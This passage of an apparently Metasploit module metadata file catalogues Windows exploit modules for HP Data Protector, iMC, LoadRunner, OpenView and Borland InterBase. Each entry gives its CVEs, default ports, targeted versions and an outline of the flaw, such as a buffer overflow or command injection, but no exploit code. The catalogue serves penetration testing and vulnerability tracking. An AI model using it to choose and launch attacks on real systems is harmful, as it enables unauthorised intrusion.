"disclosure_date": "2013-06-03",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.",
"references": [
"CVE-2013-2333",
"OSVDB-93867",
"BID-60309",
"ZDI-13-130"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP Data Protector 6.20 build 370 / Windows XP SP3",
"HP Data Protector 7.00 build 72 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_crs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_dtbclslogin": {
"name": "HP Data Protector DtbClsLogin Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_dtbclslogin",
"rank": 300,
"disclosure_date": "2010-09-09",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.",
"references": [
"CVE-2010-3007",
"OSVDB-67973",
"BID-43105",
"ZDI-10-174",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535"
],
"platform": "Windows",
"arch": "",
"rport": 3817,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_dtbclslogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_encrypted_comms": {
"name": "HP Data Protector Encrypted Communication Remote Command Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_encrypted_comms",
"rank": 300,
"disclosure_date": "2016-04-18",
"type": "exploit",
"author": [
"Jon Barg",
"Ian Lovering"
],
"description": "This module exploits a well known remote code execution exploit after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell so will only work\n against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.",
"references": [
"CVE-2016-2004",
"URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_encrypted_comms",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_exec_bar": {
"name": "HP Data Protector Backup Client Service Remote Code Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_exec_bar",
"rank": 600,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Aniway.Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows to\n execute arbitrary processes. This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.",
"references": [
"CVE-2013-2347",
"BID-64647",
"ZDI-14-008",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422",
"URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.20 build 370 / VBScript CMDStager",
"HP Data Protector 6.20 build 370 / Powershell"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_exec_bar",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_install_service": {
"name": "HP Data Protector 6.10/6.11/6.20 Install Service",
"full_name": "exploit/windows/misc/hp_dataprotector_install_service",
"rank": 600,
"disclosure_date": "2011-11-02",
"type": "exploit",
"author": [
"Ben Turner"
],
"description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\",
"references": [
"CVE-2011-0922",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.10/6.11/6.20 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_install_service",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_new_folder": {
"name": "HP Data Protector Create New Folder Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_new_folder",
"rank": 300,
"disclosure_date": "2012-03-12",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in a\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search a non corrupted copy of the payload in the heap. On the other\n hand the overflowed buffer is stored in a frame protected by stack cookies, because of\n this SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.",
"references": [
"CVE-2012-0124",
"OSVDB-80105",
"BID-52431",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
],
"platform": "Windows",
"arch": "",
"rport": 3817,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
"HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_new_folder",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_traversal": {
"name": "HP Data Protector Backup Client Service Directory Traversal",
"full_name": "exploit/windows/misc/hp_dataprotector_traversal",
"rank": 500,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.",
"references": [
"CVE-2013-6194",
"OSVDB-101630",
"BID-64647",
"ZDI-14-003",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.20 build 370 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": {
"name": "HPE iMC dbman RestartDB Unauthenticated RCE",
"full_name": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"sztivi",
"Chris Lyne",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).",
"references": [
"CVE-2017-5816",
"EDB-43198",
"ZDI-17-340",
"BID-98469",
"URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us"
],
"platform": "Windows",
"arch": "",
"rport": 2810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": {
"name": "HPE iMC dbman RestoreDBase Unauthenticated RCE",
"full_name": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"sztivi",
"Chris Lyne",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).",
"references": [
"CVE-2017-5817",
"EDB-43195",
"ZDI-17-341",
"BID-98469",
"URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us"
],
"platform": "Windows",
"arch": "",
"rport": 2810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_uam": {
"name": "HP Intelligent Management Center UAM Buffer Overflow",
"full_name": "exploit/windows/misc/hp_imc_uam",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).",
"references": [
"CVE-2012-3274",
"OSVDB-85060",
"BID-55271",
"ZDI-12-171",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863"
],
"platform": "Windows",
"arch": "",
"rport": 1811,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_uam.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_uam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_loadrunner_magentproc": {
"name": "HP LoadRunner magentproc.exe Overflow",
"full_name": "exploit/windows/misc/hp_loadrunner_magentproc",
"rank": 300,
"disclosure_date": "2013-07-27",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2013-4800",
"OSVDB-95644",
"ZDI-13-169"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / HP LoadRunner 11.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_loadrunner_magentproc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": {
"name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
"full_name": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec",
"rank": 600,
"disclosure_date": "2010-05-06",
"type": "exploit",
"author": [
"Unknown",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).",
"references": [
"CVE-2010-1549",
"ZDI-10-080",
"BID-39965",
"URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968"
],
"platform": "Windows",
"arch": "",
"rport": 54345,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows (Dropper)"
],
"mod_time": "2017-12-29 16:35:12 +0000",
"path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_magentservice": {
"name": "HP Diagnostics Server magentservice.exe Overflow",
"full_name": "exploit/windows/misc/hp_magentservice",
"rank": 200,
"disclosure_date": "2012-01-12",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"hal"
],
"description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.",
"references": [
"OSVDB-72815",
"CVE-2011-4789",
"ZDI-12-016"
],
"platform": "Windows",
"arch": "",
"rport": 23472,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Diagnostics Server 9.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_magentservice.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_magentservice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_1": {
"name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_1",
"rank": 500,
"disclosure_date": "2009-12-17",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"Fairuzan Roslan <riaf@mysec.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.",
"references": [
"CVE-2007-2280",
"BID-37396",
"OSVDB-61206",
"ZDI-09-099"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"HP OpenView Storage Data Protector A.05.50: INET, internal build 330",
"HP OpenView Storage Data Protector A.06.00: INET, internal build 331",
"HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81",
"HP Application Recovery Manager software A.06.10: INET, internal build 282"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_1.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_2": {
"name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_2",
"rank": 500,
"disclosure_date": "2009-12-17",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"Fairuzan Roslan <riaf@mysec.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the second one.",
"references": [
"CVE-2009-3844",
"BID-37250",
"OSVDB-60852",
"ZDI-09-091"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"HP OpenView Storage Data Protector A.05.50: INET, internal build 330",
"HP OpenView Storage Data Protector A.06.00: INET, internal build 331",
"HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81",
"HP Application Recovery Manager software A.06.10: INET, internal build 282"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_2.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_3": {
"name": "HP OmniInet.exe Opcode 27 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_3",
"rank": 500,
"disclosure_date": "2011-06-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.",
"references": [
"CVE-2011-1865",
"OSVDB-73571",
"URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector A.06.10 Build 611 / A.06.11 Build 243"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_3.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_3",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_4": {
"name": "HP OmniInet.exe Opcode 20 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_4",
"rank": 400,
"disclosure_date": "2011-06-29",
"type": "exploit",
"author": [
"Oren Isacson",
"muts",
"dookie",
"sinn3r <sinn3r@metasploit.com>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.",
"references": [
"CVE-2011-1865",
"OSVDB-73571",
"EDB-17468",
"URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_4.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_4",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_operations_agent_coda_34": {
"name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_operations_agent_coda_34",
"rank": 300,
"disclosure_date": "2012-07-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.",
"references": [
"CVE-2012-2019",
"OSVDB-83673",
"BID-54362",
"ZDI-12-114"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Operations Agent 11.00 / Windows XP SP3",
"HP Operations Agent 11.00 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_operations_agent_coda_34",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_operations_agent_coda_8c": {
"name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",
"full_name": "exploit/windows/misc/hp_operations_agent_coda_8c",
"rank": 300,
"disclosure_date": "2012-07-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.",
"references": [
"CVE-2012-2020",
"OSVDB-83674",
"BID-54362",
"ZDI-12-115"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Operations Agent 11.00 / Windows XP SP3",
"HP Operations Agent 11.00 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_operations_agent_coda_8c",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_ovtrace": {
"name": "HP OpenView Operations OVTrace Buffer Overflow",
"full_name": "exploit/windows/misc/hp_ovtrace",
"rank": 200,
"disclosure_date": "2007-08-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-3872",
"OSVDB-39527",
"BID-25255"
],
"platform": "Windows",
"arch": "",
"rport": 5051,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Advanced Server All English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_ovtrace.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_ovtrace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hta_server": {
"name": "HTA Web Server",
"full_name": "exploit/windows/misc/hta_server",
"rank": 0,
"disclosure_date": "2016-10-06",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.",
"references": [
"URL-https://www.trustedsec.com/july-2015/malicious-htas/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Powershell x86",
"Powershell x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/hta_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/hta_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"screen-effects"
],
"Stability": [
"crash-safe"
]
}
},
"exploit_windows/misc/ib_isc_attach_database": {
"name": "Borland InterBase isc_attach_database() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_isc_attach_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_isc_attach_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ib_isc_create_database": {
"name": "Borland InterBase isc_create_database() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_isc_create_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_isc_create_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_isc_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ib_svc_attach": {
"name": "Borland InterBase SVC_attach() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_svc_attach",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
